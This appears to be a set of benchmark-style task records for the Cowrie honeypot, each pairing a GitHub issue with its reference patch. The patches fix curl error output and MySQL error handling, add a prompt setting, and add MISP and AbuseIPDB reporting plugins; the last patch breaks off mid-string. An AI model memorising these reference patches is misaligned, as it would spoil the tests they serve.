diff --git a/src/cowrie/commands/curl.py b/src/cowrie/commands/curl.py --- a/src/cowrie/commands/curl.py +++ b/src/cowrie/commands/curl.py @@ -309,23 +309,22 @@ def success(self, data, outfile): shasum=shasum, destfile=self.safeoutfile) - # Link friendly name to hash - # os.symlink(shasum, self.safeoutfile) - - # FIXME: is this necessary? - # self.safeoutfile = hashPath - - # Update the honeyfs to point to downloaded file - self.fs.update_realfile(self.fs.getfile(outfile), hashPath) - self.fs.chown(outfile, self.protocol.user.uid, self.protocol.user.gid) + # Update the honeyfs to point to downloaded file if output is a file + if outfile: + self.fs.update_realfile(self.fs.getfile(outfile), hashPath) + self.fs.chown(outfile, self.protocol.user.uid, self.protocol.user.gid) + else: + with open(hashPath, 'rb') as f: + self.writeBytes(f.read()) self.exit() def error(self, error, url): + log.msg(error.printTraceback()) if hasattr(error, 'getErrorMessage'): # Exceptions - error = error.getErrorMessage() - self.write(error) + errormsg = error.getErrorMessage() + log.msg(errormsg) self.write('\n') self.protocol.logDispatch(eventid='cowrie.session.file_download.failed', format='Attempt to download file(s) from URL (%(url)s) failed',
`curl` prints errors to the honeypot attacker **Describe the bug** When using the command 'curl canhazip.com' inside the honeypot, rather than working, the shell throws a Python exception: ``` 'NoneType' object has no attribute 'strip' ``` **To Reproduce** Steps to reproduce the behavior: 1. Use Cowrie 1.5.2, 1.9.7, or v2.0.0 2. Connect using an account/password which provides an emulated shell 3. Enter the command `curl canhazip.com` This output is produced: ``` root@server:~# curl curl: try 'curl --help' or 'curl --manual' for more information root@server:~# curl http://canhazip.com 'NoneType' object has no attribute 'strip' root@server:~# curl canhazip.com 'NoneType' object has no attribute 'strip' ``` **Expected behavior** I would expect the public IP address of the honeypot to be returned. **Server (please complete the following information):** - OS: - Python: [e.g. Python 3.6.6, output of python -V] **Additional context** Seems like the issue may be here: https://github.com/cowrie/cowrie/blob/bf422e424c683cffef883243ac50ff1afbcff51c/src/cowrie/commands/curl.py#L50
I added self.write commands around both usages of "strip" in that file and neither appears to be the culprit. Something in handling the URL perhaps? The problem is line 328: `self.write(error)`. This prints the error to the end user. This should obviously be fixed :) The actual `strip` error is here in shell/fs.py:
```
2019-10-30T15:37:59.094869Z [twisted.python.log#error] Traceback (most recent call last):
2019-10-30T15:37:59.095219Z [twisted.python.log#error]   File "/Users/michel/src/cowrie-env/lib/python3.7/site-packages/twisted/internet/tcp.py", line 327, in connectionLost
2019-10-30T15:37:59.095913Z [twisted.python.log#error]     protocol.connectionLost(reason)
2019-10-30T15:37:59.096223Z [twisted.python.log#error]   File "/Users/michel/src/cowrie-env/lib/python3.7/site-packages/twisted/web/client.py", line 229, in connectionLost
2019-10-30T15:37:59.098157Z [twisted.python.log#error]     self.factory._disconnectedDeferred.callback(None)
2019-10-30T15:37:59.098555Z [twisted.python.log#error]   File "/Users/michel/src/cowrie-env/lib/python3.7/site-packages/twisted/internet/defer.py", line 460, in callback
2019-10-30T15:37:59.099354Z [twisted.python.log#error]     self._startRunCallbacks(result)
2019-10-30T15:37:59.099685Z [twisted.python.log#error]   File "/Users/michel/src/cowrie-env/lib/python3.7/site-packages/twisted/internet/defer.py", line 568, in _startRunCallbacks
2019-10-30T15:37:59.099970Z [twisted.python.log#error]     self._runCallbacks()
2019-10-30T15:37:59.100251Z [twisted.python.log#error] --- <exception caught here> ---
2019-10-30T15:37:59.100527Z [twisted.python.log#error]   File "/Users/michel/src/cowrie-env/lib/python3.7/site-packages/twisted/internet/defer.py", line 654, in _runCallbacks
2019-10-30T15:37:59.100803Z [twisted.python.log#error]     current.result = callback(current.result, *args, **kw)
2019-10-30T15:37:59.101076Z [twisted.python.log#error]   File "/Users/michel/src/cowrie/src/cowrie/commands/curl.py", line 319, in success
2019-10-30T15:37:59.101516Z [twisted.python.log#error]     self.fs.update_realfile(self.fs.getfile(outfile), hashPath)
2019-10-30T15:37:59.101808Z [twisted.python.log#error]   File "/Users/michel/src/cowrie/src/cowrie/shell/fs.py", line 221, in getfile
2019-10-30T15:37:59.102701Z [twisted.python.log#error]     pieces = path.strip('/').split('/')
2019-10-30T15:37:59.103045Z [twisted.python.log#error] builtins.AttributeError: 'NoneType' object has no attribute 'strip'
```
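The shape of the eventual fix, sketched with stand-in callables (`update_honeyfs` and `write_to_terminal` are hypothetical placeholders for cowrie's internals):
```python
def handle_download(outfile, data, update_honeyfs, write_to_terminal):
    # Mirrors the fix: when curl has no -o/-O option, outfile is None,
    # so only touch the fake filesystem for real paths and otherwise
    # echo the downloaded body, never the internal error, to the shell.
    if outfile:
        update_honeyfs(outfile)
    else:
        write_to_terminal(data)

handle_download(None, b"203.0.113.7\n",
                update_honeyfs=lambda path: print("fs update:", path),
                write_to_terminal=lambda body: print(body.decode(), end=""))
```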
2019-10-30T15:49:58
cowrie/cowrie
1,312
cowrie__cowrie-1312
[ "1311" ]
029507ba77ef7a81f896e1e68b288f2057b040f6
diff --git a/src/cowrie/output/mysql.py b/src/cowrie/output/mysql.py --- a/src/cowrie/output/mysql.py +++ b/src/cowrie/output/mysql.py @@ -32,7 +32,7 @@ def _runInteraction(self, interaction, *args, **kw): return adbapi.ConnectionPool._runInteraction( self, interaction, *args, **kw) except MySQLdb.OperationalError as e: - if e[0] not in (2003, 2006, 2013): + if e.args[0] not in (2003, 2006, 2013): raise e log.msg("RCP: got error {0}, retrying operation".format(e)) conn = self.connections.get(self.threadID())
Erroneous handling of MySQL errors The MySQL plug-in (`src/cowrie/output/mysql.py`) has code like this:
```python
except MySQLdb.OperationalError as e:
    if e[0] not in (2003, 2006, 2013):
        raise e
```
From there, this code has been inherited by another honeypot of mine. Yesterday I accidentally hit it by running the honeypot in a Docker container that didn't have access to the MySQL server and forgetting to disable the MySQL plug-in in the config file, so the exception occurred. Well, apparently, you can't access the error code like this (`e[0]`): you get an error saying that you're trying to index something that is not indexable. The proper way to access the error code is `e.args[0]`. See, for instance, [this example](https://github.com/B-ROY/TESTGIT/blob/40221cf254c90d37d21afb981635740aebf11949/base/site-packages/django/db/backends/mysql/base.py#L126). Man, this bug must have been there since forever... At least since 2008, judging by the comments in that code, although the links there have died from bit rot and are no longer accessible. The error is [present in Kippo](https://github.com/desaster/kippo/blob/master/kippo/dblog/mysql.py), too. Maybe this is how MySQLdb originally returned the error code?
Could this be a Python2/3 thing?
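Either way, `e.args[0]` is safe on both interpreters; a self-contained illustration with a stand-in exception class:
```python
class OperationalError(Exception):
    """Stand-in for MySQLdb.OperationalError, for illustration only."""

try:
    raise OperationalError(2006, "MySQL server has gone away")
except OperationalError as e:
    code = e.args[0]           # portable on Python 2 and 3
    if code in (2003, 2006, 2013):
        print("transient error %d, retrying operation" % code)
```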
2020-03-09T12:26:01
cowrie/cowrie
1,316
cowrie__cowrie-1316
[ "1309" ]
c3ba2cf6ef48f2b8a36ef437ea3ddd8c04959fbc
diff --git a/src/cowrie/shell/honeypot.py b/src/cowrie/shell/honeypot.py --- a/src/cowrie/shell/honeypot.py +++ b/src/cowrie/shell/honeypot.py @@ -13,6 +13,7 @@ from twisted.python.compat import iterbytes from cowrie.shell import fs +from cowrie.core.config import CowrieConfig # From Python3.6 we get the new shlex version if sys.version_info.major >= 3 and sys.version_info.minor >= 6: @@ -296,21 +297,27 @@ def showPrompt(self): if not self.interactive: return - cwd = self.protocol.cwd - homelen = len(self.protocol.user.avatar.home) - if cwd == self.protocol.user.avatar.home: - cwd = '~' - elif len(cwd) > (homelen + 1) and \ - cwd[:(homelen + 1)] == self.protocol.user.avatar.home + '/': - cwd = '~' + cwd[homelen:] - - # Example: [root@svr03 ~]# (More of a "CentOS" feel) - # Example: root@svr03:~# (More of a "Debian" feel) - prompt = '{0}@{1}:{2}'.format(self.protocol.user.username, self.protocol.hostname, cwd) - if not self.protocol.user.uid: - prompt += '# ' # "Root" user + prompt = '' + if CowrieConfig().has_option('honeypot','prompt'): + prompt = CowrieConfig().get('honeypot', 'prompt') + prompt += ' ' + else: - prompt += '$ ' # "Non-Root" user + cwd = self.protocol.cwd + homelen = len(self.protocol.user.avatar.home) + if cwd == self.protocol.user.avatar.home: + cwd = '~' + elif len(cwd) > (homelen + 1) and \ + cwd[:(homelen + 1)] == self.protocol.user.avatar.home + '/': + cwd = '~' + cwd[homelen:] + + # Example: [root@svr03 ~]# (More of a "CentOS" feel) + # Example: root@svr03:~# (More of a "Debian" feel) + prompt = '{0}@{1}:{2}'.format(self.protocol.user.username, self.protocol.hostname, cwd) + if not self.protocol.user.uid: + prompt += '# ' # "Root" user + else: + prompt += '$ ' # "Non-Root" user self.protocol.terminal.write(prompt.encode('ascii')) self.protocol.ps = (prompt.encode('ascii'), b'> ')
Update documentation on Cowrie with ELK Some information in the [official documentation regarding integration with ELK](https://cowrie.readthedocs.io/en/latest/elk/README.html) is obsolete/wrong. In `kibana.yml`: the following suggested line is not accepted by Kibana 7.6.0 and prevents it from running. `tilemap.url: https://tiles.elastic.co/v2/default/{z}/{x}/{y}.png?elastic_tile_service_tos=agree&my_app_name=kibana` For **logstash**, it is no longer possible to get the GeoIP database directly via `wget http://geolite.maxmind.com/download/geoip/database/GeoLite2-City.mmdb.gz`: you must first register on [maxmind](https://www.maxmind.com); you will then get access to a download page offering a GeoLite2 gzip archive, which must be unpacked to locate the mmdb file inside. For **filebeat**, the custom configuration file `filebeat-cowrie.conf` no longer works with filebeat 7.6.0: you must no longer specify a "prospector" but a `filebeat.inputs` section:
```
filebeat.inputs:
- type: log
  enabled: true
  paths:
    - /home/xxx/cowrie/var/log/cowrie/cowrie.json*
  encoding: plain
```
Other bug: in `./docs/elk/logstash-cowrie.conf`, the line `if [type] == "cowrie"` is incorrect and should be `if [fields][document_type] == "cowrie"` (see https://discuss.elastic.co/t/solved-cant-get-logstash-to-catch-cowrie-filebeat/165866/3). >and should be if [fields][document_type] == "cowrie" No, it shouldn't. `document_type` is deprecated in 6.x and removed in 7.x It would be nice if you could make up-to-date configs for 6.8.x and 7.x, since there are a lot of breaking changes between 6.x and 7.x. So it might take a lot of time & effort to move to 7.x if somebody already has indexes with cowrie's data. > No, it shouldn't. document_type is deprecated in 6.x and removed in 7.x @fe7ch well, what is certain is that `if [type] == "cowrie"` is incorrect for 7.6.0 and causes logstash to refuse to start. Using `if [fields][document_type] == "cowrie"` fixed the issue, although I am not able to say whether it is the right way to do it. @fe7ch you are right, `[fields][document_type]` is probably incorrect. Actually, `[type]` is too: in the logs, I see the following message indicating that even `type` is obsolete in 7.6.0...
```
Mar 09 11:12:24 instance-39 logstash[12416]: [2020-03-09T11:12:24,830][WARN ][logstash.outputs.elasticsearch][main] Detected a 6.x and above cluster: the `type` event field won't be used to determine the document _type {:es_version=>7}
```
Trying to work out the correct configuration for 7.6.0...
2020-03-23T10:58:58
cowrie/cowrie
1,317
cowrie__cowrie-1317
[ "1306" ]
c3ba2cf6ef48f2b8a36ef437ea3ddd8c04959fbc
diff --git a/src/cowrie/output/misp.py b/src/cowrie/output/misp.py new file mode 100644 --- /dev/null +++ b/src/cowrie/output/misp.py @@ -0,0 +1,134 @@ +import sys +import warnings +from functools import wraps +from pathlib import Path + +from pymisp import MISPAttribute, MISPEvent, MISPSighting + +from twisted.python import log + +import cowrie.core.output +from cowrie.core.config import CowrieConfig + +try: + from pymisp import ExpandedPyMISP as PyMISP +except ImportError: + from pymisp import PyMISP as PyMISP + + +# PyMISP is very verbose regarding Python 2 deprecation +def ignore_warnings(f): + @wraps(f) + def inner(*args, **kwargs): + with warnings.catch_warnings(record=True): + warnings.simplefilter("ignore") + response = f(*args, **kwargs) + return response + return inner + + +class Output(cowrie.core.output.Output): + """ + MISP Upload Plugin for Cowrie. + + This Plugin creates a new event for unseen file uploads + or adds sightings for previously seen files. + The decision is done by searching for the SHA 256 sum in all matching attributes. + """ + + @ignore_warnings + def start(self): + """ + Start output plugin + """ + misp_url = CowrieConfig().get('output_misp', 'base_url') + misp_key = CowrieConfig().get('output_misp', 'api_key') + misp_verifycert = ("true" == CowrieConfig().get('output_misp', 'verify_cert').lower()) + self.misp_api = PyMISP(url=misp_url, key=misp_key, ssl=misp_verifycert, debug=False) + self.is_python2 = sys.version_info[0] < 3 + self.debug = CowrieConfig().getboolean('output_misp', 'debug', fallback=False) + self.publish = CowrieConfig().getboolean('output_misp', 'publish_event', fallback=False) + + def stop(self): + """ + Stop output plugin + """ + pass + + def write(self, entry): + """ + Push file download to MISP + """ + if entry['eventid'] == 'cowrie.session.file_download': + file_sha_attrib = self.find_attribute("sha256", entry["shasum"]) + if file_sha_attrib: + # file is known, add sighting! + if self.debug: + log.msg("File known, add sighting") + self.add_sighting(entry, file_sha_attrib) + else: + # file is unknown, new event with upload + if self.debug: + log.msg("File unknwon, add new event") + self.create_new_event(entry) + + @ignore_warnings + def find_attribute(self, attribute_type, searchterm): + """ + Returns a matching attribute or None if nothing was found. 
+ """ + result = self.misp_api.search( + controller="attributes", + type_attribute=attribute_type, + value=searchterm + ) + + # legacy PyMISP returns the Attribute wrapped in a response + if self.is_python2: + result = result["response"] + + if result["Attribute"]: + return result["Attribute"][0] + else: + return None + + @ignore_warnings + def create_new_event(self, entry): + if self.is_python2: + self.misp_api.upload_sample( + entry["shasum"], + entry["outfile"], + None, + distribution=1, + info="File uploaded to Cowrie ({})".format(entry["sensor"]), + analysis=0, + threat_level_id=2 + ) + else: + attribute = MISPAttribute() + attribute.type = "malware-sample" + attribute.value = entry["shasum"] + attribute.data = Path(entry["outfile"]) + attribute.comment = "File uploaded to Cowrie ({})".format(entry["sensor"]) + attribute.expand = "binary" + event = MISPEvent() + event.info = "File uploaded to Cowrie ({})".format(entry["sensor"]) + event.attributes = [attribute] + event.run_expansions() + if self.publish: + event.publish() + result = self.misp_api.add_event(event) + if self.debug: + log.msg("Event creation result: \n%s" % result) + + @ignore_warnings + def add_sighting(self, entry, attribute): + if self.is_python2: + self.misp_api.sighting( + uuid=attribute["uuid"], + source="{} (Cowrie)".format(entry["sensor"]) + ) + else: + sighting = MISPSighting() + sighting.source = "{} (Cowrie)".format(entry["sensor"]) + self.misp_api.add_sighting(sighting, attribute)
Upload payloads to MISP **Is your feature request related to a problem? Please describe.** I'm running multiple instances of cowrie and have always looked for a way to automate some tasks revolving around first triage, as well as having all collected payloads readily available and stored safely. MISP meets these requirements, so I have been tinkering around with an output plugin to upload encountered payloads to a MISP instance. **Describe the solution you'd like** The idea is to check the SHA256 hash of an encountered payload. If it is unknown to the MISP instance, a new case is created and the payload is uploaded as a *malware-sample*. If the SHA256 already exists, a sighting is added to the existing MISP case, thereby generating insights into the distribution timeline of a payload. **Describe alternatives you've considered** I have considered using other solutions like rsync tasks to copy payloads to a directory that is shared between all honeypots, but the combination of the MISP sightings graph, the search function and the degree of automation available through the WebUI is hard to beat. That said, I'm always open to discussion and feedback if there is a better way to do this. **Additional context** If there is interest from your side, I already have a running fork of cowrie with the added MISP output plugin, so I can open a Pull Request :) An example of how the output of this integration looks can be seen in the attached screenshot. Please note the graph in the main *activity* as well as in the *sha256* row at the bottom. A detail view of the graph can be found in the second screenshot. ![grafik](https://user-images.githubusercontent.com/8026915/75327653-11bd5b00-587d-11ea-8da6-b22be8886a1d.png) ![grafik](https://user-images.githubusercontent.com/8026915/75328070-ac1d9e80-587d-11ea-9bc8-3f501b0f5629.png)
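The event-or-sighting decision described above, sketched against a toy stand-in for the PyMISP calls (all names here are illustrative, not the real PyMISP API):
```python
class FakeMISP:
    """Toy stand-in for the PyMISP calls, for illustration only."""
    def __init__(self):
        self.seen = {}
    def find_attribute(self, sha256):
        return self.seen.get(sha256)
    def create_event(self, sha256, info):
        self.seen[sha256] = {"uuid": "demo-uuid", "info": info}
        print("new event:", info)
    def add_sighting(self, attribute, source):
        print("sighting on", attribute["uuid"], "from", source)

def handle_upload(api, sha256, sensor):
    # Unseen hash -> new event with the sample; known hash -> sighting.
    attribute = api.find_attribute(sha256)
    if attribute is None:
        api.create_event(sha256, "File uploaded to Cowrie (%s)" % sensor)
    else:
        api.add_sighting(attribute, "%s (Cowrie)" % sensor)

api = FakeMISP()
handle_upload(api, "ab" * 32, "sensor01")  # first upload -> event
handle_upload(api, "ab" * 32, "sensor02")  # repeat -> sighting
```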
2020-03-23T14:55:21
cowrie/cowrie
1,346
cowrie__cowrie-1346
[ "1271" ]
0af58f906d98d328219d50804f494248003e9105
diff --git a/src/cowrie/output/abuseipdb.py b/src/cowrie/output/abuseipdb.py new file mode 100644 --- /dev/null +++ b/src/cowrie/output/abuseipdb.py @@ -0,0 +1,487 @@ +# MIT License # +# # +# Copyright (c) 2020 Benjamin Stephens <[email protected]> # +# # +# Permission is hereby granted, free of charge, to any person obtaining a # +# copy of this software and associated documentation files (the "Software"), # +# to deal in the Software without restriction, including without limitation # +# the rights to use, copy, modify, merge, publish, distribute, sublicense, # +# and/or sell copies of the Software, and to permit persons to whom the # +# Software is furnished to do so, subject to the following conditions: # +# # +# The above copyright notice and this permission notice shall be included in # +# all copies or substantial portions of the Software. # +# # +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # +# DEALINGS IN THE SOFTWARE. # + + +""" Cowrie plugin for reporting login attempts via the AbuseIPDB API. + +"AbuseIPDB is a project dedicated to helping combat the spread of hackers, +spammers, and abusive activity on the internet." <https://www.abuseipdb.com/> +""" + + +__author__ = 'Benjamin Stephens' +__version__ = '0.3b3' + + +import pickle +from collections import deque +from datetime import datetime +from json.decoder import JSONDecodeError +from pathlib import Path +from sys import version_info +from time import sleep, time + +from treq import post + +from twisted.internet import defer, reactor, threads +from twisted.python import log +from twisted.web import http + +from cowrie.core import output +from cowrie.core.config import CowrieConfig + + +# How often we clean and dump and our lists/dict... +CLEAN_DUMP_SCHED = 600 +# ...and the file we dump to. +DUMP_FILE = 'aipdb.dump' + +ABUSEIP_URL = 'https://api.abuseipdb.com/api/v2/report' +# AbuseIPDB will just 429 us if we report an IP too often; currently 15 minutes +# (900 seconds); set lower limit here to protect againt bad user input. +REREPORT_MINIMUM = 900 + + +class Output(output.Output): + def start(self): + self.tolerance_attempts = CowrieConfig().getint('output_abuseipdb', 'tolerance_attempts', fallback=10) + self.state_path = CowrieConfig().get('output_abuseipdb', 'dump_path') + self.state_path = Path(*(d for d in self.state_path.split('/'))) + self.state_dump = self.state_path / DUMP_FILE + + if version_info.minor < 6: + # PathLike object not compatible with with open in python < 3.6 + self.state_dump = str(self.state_dump) + + self.logbook = LogBook(self.tolerance_attempts, self.state_dump) + # Pass our instance of LogBook() to Reporter() so we don't end up + # working with different records. + self.reporter = Reporter(self.logbook, self.tolerance_attempts) + + # We store the LogBook state any time a shutdown occurs. 
The rest of + # our start-up is just for loading and cleaning the previous state + try: + with open(self.state_dump, 'rb') as f: + self.logbook.update(pickle.load(f)) + + # Check to see if we're still asleep after receiving a Retry-After + # header in a previous response + if self.logbook['sleeping']: + t_wake = self.logbook['sleep_until'] + t_now = time() + if t_wake > t_now: + # If we're meant to be asleep, we'll set logbook.sleep to + # true and logbook.sleep_until to the time we can wake-up + self.logbook.sleeping = True + self.logbook.sleep_until = t_wake + # and we set an alarm so the reactor knows when he can drag + # us back out of bed + reactor.callLater(t_wake - t_now, self.logbook.wakeup) + + del self.logbook['sleeping'] + del self.logbook['sleep_until'] + tolerated = self.logbook.pop('tolerated') + + except (pickle.UnpicklingError, FileNotFoundError, KeyError): + if self.state_path.exists(): + pass + else: + # If we don't already have an abuseipdb directory, let's make + # one with the necessary permissions now. + Path(self.state_path).mkdir(mode=0o700, parents=False, exist_ok=False) + + # And we do a clean-up to make sure that we're not carrying any expired + # entries. The clean-up task ends by calling itself in a callLater, + # thus running every CLEAN_DUMP_SCHED seconds until the end of time. + self.logbook.cleanup_and_dump_state() + + # If tolerance_attempts > the previous setting, we need to change the + # maximum length of the deque for any previously seen IP that we're + # loading, otherwise we'd potentially have IPs that may never trigger + # a report + try: + if tolerated != self.tolerance_attempts: + for k in self.logbook: + if self.logbook[k].__class__() == deque(): + self.logbook[k] = deque([*self.logbook[k]], maxlen=self.tolerance_attempts) + except UnboundLocalError: + pass + + log.msg( + eventid='cowrie.abuseipdb.started', + format='AbuseIPDB Plugin version {} started. Currently in beta.'.format(__version__), + ) + + def stop(self): + self.logbook.cleanup_and_dump_state(mode=1) + + def write(self, ev): + if self.logbook.sleeping: + return + + if ev['eventid'].rsplit('.', 1)[0] == 'cowrie.login': + # If tolerance_attempts was set to 1 or 0, we don't need to + # keep logs so our handling of the event is different than if > 1 + if self.tolerance_attempts <= 1: + self.intolerant_observer(ev['src_ip'], time(), ev['username']) + else: + self.tolerant_observer(ev['src_ip'], time()) + + def intolerant_observer(self, ip, t, uname): + # Checks if already reported; if yes, checks if we can rereport yet. + # The entry for a reported IP is a tuple (None, time_reported). If IP + # is not already in logbook, reports it immediately + if ip in self.logbook: + if self.logbook.can_rereport(ip, t): + self.reporter.report_ip_single(ip, t, uname) + else: + return + else: + self.reporter.report_ip_single(ip, t, uname) + + def tolerant_observer(self, ip, t): + # Appends the time an IP was seen to it's list in logbook. Once the + # length of the list equals tolerance_attempts, the IP is reported. + if ip in self.logbook: + try: + if self.logbook[ip][0]: + # Evaluates true if IP not already reported. If reported, + # logbook entry is of the form (None, time_reported). 
+ self.logbook[ip].append(t) + self.logbook.clean_expired_timestamps(ip, t) + + if len(self.logbook[ip]) >= self.tolerance_attempts: + self.reporter.report_ip_multiple(ip) + + elif self.logbook.can_rereport(ip, t): + # Check if reported IP is ready for re-reporting + self.logbook[ip] = deque([t], maxlen=self.tolerance_attempts) + + else: + return + + except IndexError: + # If IP address was in logbook but had no entries then we're + # fine to re-report. + self.logbook[ip].append(t) + + else: + self.logbook[ip] = deque([t], maxlen=self.tolerance_attempts) + + +class LogBook(dict): + """ Dictionary class with methods for cleaning and dumping its state. + + This class should be treated as global state. For the moment this is + achieved simply by passing the instance created by Output() directly to + Reporter(). Sharing is caring. + """ + def __init__(self, tolerance_attempts, state_dump): + self.sleeping = False + self.sleep_until = 0 + self.tolerance_attempts = tolerance_attempts + self.tolerance_window = 60 * CowrieConfig().getint('output_abuseipdb', 'tolerance_window', fallback=120) + self.rereport_after = 3600 * CowrieConfig().getfloat('output_abuseipdb', 'rereport_after', fallback=24) + if self.rereport_after < REREPORT_MINIMUM: + self.rereport_after = REREPORT_MINIMUM + self.state_dump = state_dump + # To write our dump to disk we have a method we call in a thread so we + # don't block if we get slow io. This is a cheap hack to get a lock on + # the file. See self.write_dump_file() + self._writing = False + super().__init__() + + def wakeup(self): + # This is the method we pass in a callLater() before we go to sleep. + self.sleeping = False + self.sleep_until = 0 + self.recall = reactor.callLater(CLEAN_DUMP_SCHED, self.cleanup_and_dump_state) + log.msg( + eventid='cowrie.abuseipdb.wakeup', + format='AbuseIPDB plugin resuming activity after receiving ' + 'Retry-After header in previous response.', + ) + + def clean_expired_timestamps(self, ip_key, current_time): + # Performs popleft() if leftmost timestamp has expired. Continues doing + # so until either; 1) a timestamp within our reporting window is + # reached, or; 2) the list is empty. + while self[ip_key]: + if not self[ip_key][0]: + break + elif self[ip_key][0] < current_time - self.tolerance_window: + self[ip_key].popleft() + else: + break + + def find_and_delete_empty_entries(self): + # Search and destroy method. Iterates over dict, appends k to delete_me + # where v is an empty list. + delete_me = [] + for k in self: + if not self[k]: + delete_me.append(k) + self.delete_entries(delete_me) + + def delete_entries(self, delete_me): + for i in delete_me: + del self[i] + + def can_rereport(self, ip_key, current_time): + # Checks if an IP in the logbook that has already been reported is + # ready to be re-reported again. + try: + if current_time > self[ip_key][1] + self.rereport_after: + return True + + elif self[ip_key][0] and self.tolerance_attempts <= 1: + # If we were previously running with a tolerance_attempts > 1 + # and have been been restarted with tolerance_attempts <= 1, + # we could still be carrying some logs which would evaluate as + # false in our first test. Reported IPs will still evaluate + # false here. + return True + + else: + return False + + except IndexError: + return True + + def cleanup_and_dump_state(self, mode=0): + # Runs a full clean-up of logbook. Re-calls itself in CLEAN_DUMP_SCHED + # seconds. 
MODES: 0) Normal looping task, and; 1) Sleep/Stop mode;
+        # cancels any scheduled callLater() and doesn't recall itself.
+        if mode == 1:
+            try:
+                self.recall.cancel()
+            except AttributeError:
+                pass
+
+        if self.sleeping:
+            t = self.sleep_until
+        else:
+            t = time()
+
+        delete_me = []
+        for k in self:
+            if self.can_rereport(k, t):
+                delete_me.append(k)
+            self.clean_expired_timestamps(k, t)
+        self.delete_entries(delete_me)
+
+        self.find_and_delete_empty_entries()
+
+        self.dump_state()
+
+        if mode == 0 and not self.sleeping:
+            self.recall = reactor.callLater(CLEAN_DUMP_SCHED, self.cleanup_and_dump_state)
+
+    def dump_state(self):
+        dump = {
+            'sleeping': self.sleeping,
+            'sleep_until': self.sleep_until,
+            # Store current tolerance_attempts for comparison on next start
+            'tolerated': self.tolerance_attempts,
+        }
+
+        for k, v in self.items():
+            dump[k] = v
+
+        reactor.callInThread(self.write_dump_file, dump)
+
+    def write_dump_file(self, dump):
+        # Check self._writing; waits for release; timeout after 10 seconds.
+        i = 0
+        while self._writing:
+            sleep(1)
+            i += 1
+            if i >= 10:
+                return
+
+        # Acquire 'lock'
+        self._writing = True
+
+        with open(self.state_dump, 'wb') as f:
+            pickle.dump(dump, f, protocol=pickle.HIGHEST_PROTOCOL)
+
+        # Release 'lock'
+        self._writing = False
+
+
+class Reporter:
+    """ HTTP client and methods for preparing report parameters.
+    """
+    def __init__(self, logbook, attempts):
+        self.logbook = logbook
+        self.attempts = attempts
+        self.headers = {
+            'User-Agent': 'Cowrie Honeypot AbuseIPDB plugin',
+            'Accept': 'application/json',
+            'Key': CowrieConfig().get('output_abuseipdb', 'api_key')
+        }
+
+    def report_ip_single(self, ip, t, uname):
+        self.logbook[ip] = (None, t)
+
+        t = self.epoch_to_string_utc(t)
+
+        params = {
+            'ip': ip,
+            'categories': '18,22',
+            'comment': 'Cowrie Honeypot: Unauthorised SSH/Telnet login attempt '
+                       'with user "{}" at {}'.format(uname, t)
+        }
+
+        self.http_request(params)
+
+    def report_ip_multiple(self, ip):
+        t_last = self.logbook[ip].pop()
+        t_first = self.epoch_to_string_utc(self.logbook[ip].popleft())
+
+        self.logbook[ip] = (None, t_last)
+
+        t_last = self.epoch_to_string_utc(t_last)
+
+        params = {
+            'ip': ip,
+            'categories': '18,22',
+            'comment': 'Cowrie Honeypot: {} unauthorised SSH/Telnet login attempts '
+                       'between {} and {}'.format(self.attempts, t_first, t_last)
+        }
+
+        self.http_request(params)
+
+    @staticmethod
+    def epoch_to_string_utc(t):
+        t_utc = datetime.utcfromtimestamp(t)
+        return t_utc.strftime('%Y-%m-%dT%H:%M:%SZ')
+
+    @staticmethod
+    def log_response_failed(ip, response, reason):
+        log.msg(
+            eventid='cowrie.abuseipdb.reportfail',
+            format='AbuseIPDB plugin failed to report IP %(IP)s. Received HTTP '
+                   'status code %(response)s in response. Reason: %(reason)s.',
+            IP=ip,
+            response=response,
+            reason=reason,
+        )
+
+    @defer.inlineCallbacks
+    def http_request(self, params):
+        try:
+            response = yield post(
+                url=ABUSEIP_URL,
+                headers=self.headers,
+                params=params,
+            )
+
+        except Exception as e:
+            log.msg(
+                eventid='cowrie.abuseipdb.reportfail',
+                format='AbuseIPDB plugin failed to report IP %(IP)s. '
+                       'Exception raised: %(exception)s.',
+                IP=params['ip'],
+                exception=repr(e),
+            )
+            return
+
+        if response.code != http.OK:
+            if response.code == 429:
+                return self.rate_limit_handler(params, response)
+
+            try:
+                reason = http.RESPONSES[response.code].decode('utf-8')
+            except Exception:
+                reason = 'Unable to determine.'
+ + self.log_response_failed(params['ip'], response.code, reason) + + return + + j = yield response.json() + + log.msg( + eventid='cowrie.abuseipdb.reportedip', + format='AbuseIPDB plugin successfully reported %(IP)s. Current ' + 'AbuseIPDB confidence score for this IP is %(confidence)s', + IP=params['ip'], + confidence=j['data']['abuseConfidenceScore'] + ) + + @defer.inlineCallbacks + def rate_limit_handler(self, params, response): + try: + j = yield response.json() + reason = j['errors'][0]['detail'] + + except (KeyError, JSONDecodeError): + reason = 'No other information provided or unexpected response' + + self.log_response_failed(params['ip'], response.code, reason) + + # AbuseIPDB will respond with a 429 and a Retry-After in its response + # headers if we've exceeded our limits for the day. Here we test for + # that header and, if it exists, put ourselves to sleep. + retry_after = yield response.headers.hasHeader('Retry-After') + + if retry_after: + retry = yield response.headers.getRawHeaders('Retry-After') + retry = int(retry.pop()) + + if retry > 86340: + yield threads.deferToThread(self.sleeper_thread) + + log.msg( + eventid='cowrie.abuseipdb.ratelimited', + format='AbuseIPDB plugin received Retry-After header > 86340 ' + 'seconds in previous response. Possible delayed quota ' + 'reset on AbuseIPDB servers; retrying request now.', + ) + + return self.http_request(params) + + self.logbook.sleeping = True + self.logbook.sleep_until = time() + retry + reactor.callLater(retry, self.logbook.wakeup) + # It's not serious if we don't, but it's best to call the clean-up + # after logbook.sleeping has been set to True. The clean-up method + # checks for this flag and will use the wake-up time rather than + # the current time when sleep is set. mode=1 ensures we'll cancel + # any already scheduled calls to clean-up and don't schedule + # another one until the wake-up method calls it again. + self.logbook.cleanup_and_dump_state(mode=1) + + self.epoch_to_string_utc(self.logbook.sleep_until) + log.msg( + eventid='cowrie.abuseipdb.ratelimited', + format='AbuseIPDB plugin received Retry-After header in ' + 'response. Reporting activity will resume 